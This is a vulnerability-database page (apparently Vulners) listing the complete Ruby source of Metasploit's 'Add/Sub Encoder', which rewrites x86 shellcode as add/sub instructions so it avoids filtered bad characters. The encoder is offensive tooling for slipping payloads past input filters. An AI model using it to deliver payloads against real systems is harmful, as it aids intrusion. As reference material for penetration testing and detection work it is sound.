Lucene search
K

Add/Sub Encoder

🗓️ 08 Apr 2013 17:51:39Reported by Melih Sarica <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 18 Views

Encodes payload with add or sub instructions. This idea came from (offensive-security) muts' hp nnm 7.5.1 exploit.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Encoder
  Rank = ManualRanking

  def initialize
    super(
      'Name'             => 'Add/Sub Encoder',
      'Description'      => %q{
          Encodes payload with add or sub instructions. This idea came
          from (offensive-security) muts' hp nnm 7.5.1 exploit.
      },
      'Author'           => 'Melih Sarica <ms[at]sevure.com>',
      'Arch'             => ARCH_X86,
      'License'          => MSF_LICENSE,
      'Decoder'          =>
        {
          'BlockSize'  => 4
        })
  end

  def add_or_sub(avchars)
    add = [0x05, 0x50, 0x58, 0x25, 0x54, 0x5C]
    sub = [0x2D, 0x50, 0x58, 0x25, 0x54, 0x5C]
    return 1 if add.all?{|ch|avchars.include?ch.chr}
    return 2 if sub.all?{|ch|avchars.include?ch.chr}
    return 0
  end

  def write_inst(inst, mcode)
    @data << inst
    if mcode != 0
      for i in 0...4
        t = mcode & 0x000000FF;
        @data << t
        mcode = mcode >> 8;
      end
    end
  end

  def rand_with_av_chars()
    t2 = 0
    for i in 0...4
      c = @avchars[rand(@avchars.size)].ord.to_i()
      t2 = t2 <<8
      t2 += c
    end
    return t2
  end

  def check_non_av_chars(target)
    for i in 0...4
      t = target & 0x000000FF;
      return true if not @avchars.include?t.chr
      target = target >> 8;
    end
    return false
  end

  def encode_inst(target)
    begin
      a = rand_with_av_chars()
      b = rand_with_av_chars()
      c = target - a - b if @set == 1
      c = 0 - target - a - b if @set == 2
      c = c%(0xFFFFFFFF+1)
    end while check_non_av_chars(c) == true
    write_inst(@inst["opcode"], a)
    write_inst(@inst["opcode"], b)
    write_inst(@inst["opcode"], c)
  end

  def encode_shellcode(target, z1, z2)
    write_inst(@inst["and"], z1);
    write_inst(@inst["and"], z2);
    encode_inst(target);
    write_inst(@inst["push"], 0);
  end

  def decoder_stub(state)
    buf = ""
    shellcode = state.buf.split(//)
    while shellcode.size>0
      buf << shellcode.pop(4).join
    end
    state.buf = buf
    @data = ""
    @avchars = ""
    for i in 0..255
      @avchars = @avchars + i.chr.to_s if not state.badchars.include?i.chr.to_s
    end
    offset = (datastore['BufferOffset'] || 0).to_i
    @inst = {}
    @set = add_or_sub(@avchars)
    if @set == 0 then
      raise EncodingError, "Bad character list includes essential characters."
      exit
    elsif @set == 1 then #add
      @inst["opcode"] = 0x05
    else #sub
      @inst["opcode"] = 0x2d
    end
    @inst["push"] = 0x50
    @inst["pop"] = 0x58
    @inst["and"] = 0x25
    @inst["push_esp"] = 0x54
    @inst["pop_esp"] = 0x5c
    if state.buf.size%4 != 0 then
      raise EncodingError, "Shellcode size must be divisible by 4, try nop padding."
      exit
    end
    #init
    write_inst(@inst["push_esp"], 0)
    write_inst(@inst["pop"], 0)
    encode_inst(offset)
    write_inst(@inst["push"], 0)
    write_inst(@inst["pop_esp"], 0)
    #zeroing registers
    begin
      @z1 = rand_with_av_chars()
      @z2 = rand_with_av_chars()
    end while @z1&@z2 != 0
    decoder = @data
    return decoder
  end

  def encode_block(state, block)
    #encoding shellcode
    @data = ""
    target = block.split(//)
    return if target.size<4
    t = 0
    for i in 0..3
      t1 = target[3-i][0].ord.to_i
      t = t<<8
      t = t + t1
    end
    encode_shellcode(t, @z1, @z2);
    encoded = @data
    return encoded
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation